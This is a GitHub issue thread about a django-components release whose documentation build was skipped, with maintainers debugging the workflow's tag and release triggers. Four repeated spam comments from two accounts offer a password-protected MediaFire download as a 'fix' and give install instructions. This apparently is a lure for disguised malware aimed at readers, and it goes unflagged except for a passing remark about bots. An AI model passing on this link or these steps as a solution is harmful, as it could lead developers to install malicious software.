### ISSUE TITLE
Release 0.93 did not trigger documentation build

### ISSUE THREAD

**Issue by dalito** [EmilStenstrom/django-components#625]
The docs for the newest release 0.93 were not created. The job was skipped, see https://github.com/EmilStenstrom/django-components/actions/workflows/docs.yml

It could be a missing trigger on new tags. Something like:
```
on:
  push:
    tags:
      - '[0-9].[0-9]+'
    ....
```

I also wonder if mike expects versions with a leading "v", so a tag "v0.93" which is more common for version tags.

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by JuroOravec** [comment]
Ugh, what's up with these bots?

Anyway, it's it because of the errors when building docs? Or is that something else? 

E.g. see https://github.com/EmilStenstrom/django-components/actions/runs/10571768256/job/29288389326

**Comment by dalito** [comment]
The errors/warnings in the build are not the problem(you would see the log).

Currently the job triggers on release or manually but not on tags (problem 1).

Also I speculate that with the release trigger

```
- name: Deploy docs (Released published)
        if: github.event_name == 'release' && github.event.action == 'published' && github.ref_type == 'tag'
```

the if-line leads to skipping the job. I think on release `github.ref_type` is not "tag" for this trigger. (problem 2)

So I wonder why it is not just 
```
- name: Deploy docs (Released published)
        if: github.event_name == 'release' && github.event.action == 'published'
```

**Comment by EmilStenstrom** [comment]
@dalito I'm open to trying it out. If you are open to dedicating some time to get this running, I can give you commit rights so you can iterate faster?

**Comment by EmilStenstrom** [comment]
@dalito I just fixed the dependency issue.

**Comment by dalito** [comment]
@EmilStenstrom - thanks for offering commit rights but I probably don't need them. I should be able to experiment in a fork as well since you're only using GitHub and no external services. Will give it try later today or tomorrow.

**Comment by JuroOravec** [comment]
Btw the builds are (were?) still failing when pushing tag due to conflicts.

This should hopefully fix it https://github.com/EmilStenstrom/django-components/pull/649
